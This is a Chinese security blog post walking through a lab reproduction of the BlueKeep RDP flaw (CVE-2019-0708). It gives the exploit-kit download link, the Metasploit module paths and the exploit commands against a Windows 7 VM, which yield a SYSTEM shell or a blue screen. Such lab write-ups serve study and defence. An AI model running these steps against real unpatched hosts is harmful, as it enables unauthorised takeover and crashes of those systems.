<!DOCTYPE html><html lang="en"><head><meta name="generator" content="Hexo 3.9.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><title>RDP漏洞CVE-2019-0708复现 | WLSMILE Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">RDP漏洞CVE-2019-0708复现</h1><a id="logo" href="/.">WLSMILE Blog</a><p class="description"></p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Home</i></a><a href="/archives/"><i class="fa fa-archive"> Archive</i></a><a href="/about/"><i class="fa fa-user"> About</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">RDP漏洞CVE-2019-0708复现</h1><div class="post-meta">Sep 11, 2019<span> | </span><span class="category"><a href="/categories/其他/">其他</a></span></div><div class="post-content"><h1 id="0x01-漏洞描述"><a href="#0x01-漏洞描述" class="headerlink" title="0x01 漏洞描述"></a>0x01 漏洞描述</h1><blockquote>
<p>在2019年5月，微软发布了针对远程代码执行漏洞CVE-2019-0708的补丁更新，该漏洞也称为“BlueKeep”，漏洞存在于远程桌面服务（RDS）的代码中。此漏洞是预身份验证，无需用户交互，因此具有潜在武器化蠕虫性性漏洞利用的危险。如果成功利用此漏洞，则可以使用“系统”权限执行任意代码。Microsoft安全响应中心的建议表明这个漏洞也可能会成为一种蠕虫攻击行为，类似于Wannacry和EsteemAudit等攻击行为。由于此漏洞的严重性及其对用户的潜在影响，微软采取了罕见的预警步骤，为不再受支持的Windows XP操作系统发布补丁，以保护Windows用户。<br>自该补丁于5月发布以来，该漏洞受到了安全行业的广泛关注，在野利用漏洞只是时间问题</p>
</blockquote>
<p>在9月7号的凌晨GitHub上公布可利用的EXP，可是正忙于项目无法及时复现。于是今晚趁着无聊复现一波，环境如下。</p>
<p>攻击机ip（kali linux）：192.168.1.105<br>靶   机ip（win7  SP1) ：192.168.1.106<br>win7 SP1 镜像地址：<br><code>ed2k://|file|cn_windows_7_professional_with_sp1_x64_dvd_u_677031.iso|3420557312|430BEDC0F22FA18001F717F7AF08C9D5|/</code></p>
<p>CVE-2019-0708利用套件：<br><code>https://pan.baidu.com/s/1HqmKbp4ZjMsUm0gRlTEVFQ 提取码: vkqw</code></p>
<h1 id="0x02-复现过程"><a href="#0x02-复现过程" class="headerlink" title="0x02 复现过程"></a>0x02 复现过程</h1><p>复现的时候也是有很多问题，我使用的metasploit的版本是5.0.22，所以无法适配最新的cve-2019-0708漏洞的套件，所以要在kali中更新一波metasploit。<br>执行两行代码可直接更新：</p>
<pre><code>apt-get update
apt-get install metasploit-framework</code></pre><p><img src="/images/3/1.png" alt></p>
<p>更新过后即可将套件放至各个模块文件下，但是在这个过程中我所看到的博客里面看到的都是一个路径，而这个路径是手动安装metasploit时候的安装路径，所以在放至路径的时候出错将会出现如下错误。</p>
<pre><code>[-] 192.168.1.106:3389 - Exploit failed: NameError undefined local variable or method `rdp_connect&#39; for #&lt;Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00007f9c251837b0&gt;</code></pre><p>复现过程中这个也是最浪费时间的一个地方了，最后在kali linux 论坛中找到了kali中metasploit的模块路径。在下载套件之后将文件移动到各个文件夹下即可</p>
<pre><code>rdp.rb -&gt; /usr/share/metasploit-framework/lib/msf/core/exploit 

rdp_scanner.rb -&gt; /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 

cve_2019_0708_bluekeep.rb -&gt; /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 

cve_2019_0708_bluekeep_rce.rb -&gt; /usr/share/metasploit-framework/modules/exploits/windows/rdp 

需要注意如果没有目录就去创建个。
</code></pre><p>接下来就可以进入metasploit控制台操作了，进入之后先要重新加载所有模块<br><code>reload_all</code></p>
<p>之后直接搜索0708漏洞。</p>
<pre><code>msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) &gt; search 0708
=======

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/browser/clear_quest_cqole        2012-05-19       normal  No     IBM Rational ClearQuest CQOle Remote Code Execution
   2  exploit/windows/browser/tumbleweed_filetransfer  2008-04-07       great   No     Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
   3  exploit/windows/rdp/cve_2019_0708_bluekeep_rce   2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   4  auxiliary/windows/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
</code></pre><pre><code>use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.106
set target 3
exploit
</code></pre><p>target 参数在其他各个博客当中都讲到如果是VMware需要设置为3，所以我依照参考设置为3。</p>
<p><img src="/images/3/2.png" alt></p>
<p>现在就是开开心心的等待shell的出现啦</p>
<p><img src="/images/3/3.png" alt></p>
<p>等了大概两分钟，，终于结果出来了！！目标直接蓝屏！！？难道这是蓝屏的EXP！？</p>
<p><img src="/images/3/4.png" alt></p>
<p>于是我又尝试了两三次，，结果靶机依然是蓝屏崩溃，，这如果是生产环境可不得了。<br>最后继续看别人博客发的文章，发现也没有什么区别的，无奈之下我只好改变target参数的值了。</p>
<pre><code>set target 1
exploit</code></pre><p>随后进入的就是漫长的等待了，正当要绝望，准备设置为参数2的时候，他来了，他来了，他真的来了~~</p>
<p><img src="/images/3/5.png" alt></p>
<p>赶紧回头看看靶机有没有什么异常</p>
<p><img src="/images/3/6.png" alt></p>
<p>激动的时候我又在想，为什么 target 1 的时候能够成功拿下shell，看了一下info信息之后只有 target 1 后面没有什么特殊的环境限制，可能就会兼容的更多一些？？</p>
<p>CVE-2019-0708拿下shell之后直接为SYSTEM权限</p>
<p><img src="/images/3/7.png" alt></p>
<p>至此复现结束。</p>
<h1 id="0x03-漏洞危害"><a href="#0x03-漏洞危害" class="headerlink" title="0x03   漏洞危害"></a>0x03   漏洞危害</h1><p>目前公布的影响范围：</p>
<pre><code>Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP</code></pre><p>该漏洞的影响范围巨大，甚至能和MS17-010相媲美，但是在实际利用过程中也可能造成实际生产环境的破坏，所以在检测是还是用scanner中的检测模块较好.</p>
</div><div class="tags"><a href="/tags/漏洞复现/">漏洞复现</a></div><div class="post-nav"><a class="pre" href="/2019/10/08/1/">SQLMAP使用总结</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="https://luckdogiii.github.io"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Categories</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Linux/">Linux</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web安全/">Web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/其他/">其他</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/工具/">工具</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"><a href="/tags/sqlmap/" style="font-size: 15px;">sqlmap</a> <a href="/tags/漏洞复现/" style="font-size: 15px;">漏洞复现</a> <a href="/tags/提权/" style="font-size: 15px;">提权</a> <a href="/tags/Linux/" style="font-size: 15px;">Linux</a> <a href="/tags/注入/" style="font-size: 15px;">注入</a> <a href="/tags/sql-server/" style="font-size: 15px;">sql server</a> <a href="/tags/漏洞利用/" style="font-size: 15px;">漏洞利用</a> <a href="/tags/端口信息/" style="font-size: 15px;">端口信息</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> Recent</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/11/06/11/">端口信息及漏洞利用总结（转）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/15/10/">致远 OA A8远程Getshell</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/15/9/">泛微OA远程代码执行</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/14/8/">SQL SERVER 注入（三）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/11/7/">SQL SERVER 注入（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/11/6/">SQL SERVER 注入（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/09/5/">Linux提权（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/09/4/">Linux提权（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/08/2/">phpstudy远程代码执行复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/08/1/">SQLMAP使用总结</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> Links</i></div><ul></ul><a href="http://www.example1.com/" title="wlsmile" target="_blank">wlsmile</a><ul></ul><a href="http://www.example2.com/" title="site-name2" target="_blank">site-name2</a><ul></ul><a href="http://www.example3.com/" title="site-name3" target="_blank">site-name3</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2019 <a href="/." rel="nofollow">WLSMILE Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div></body></html>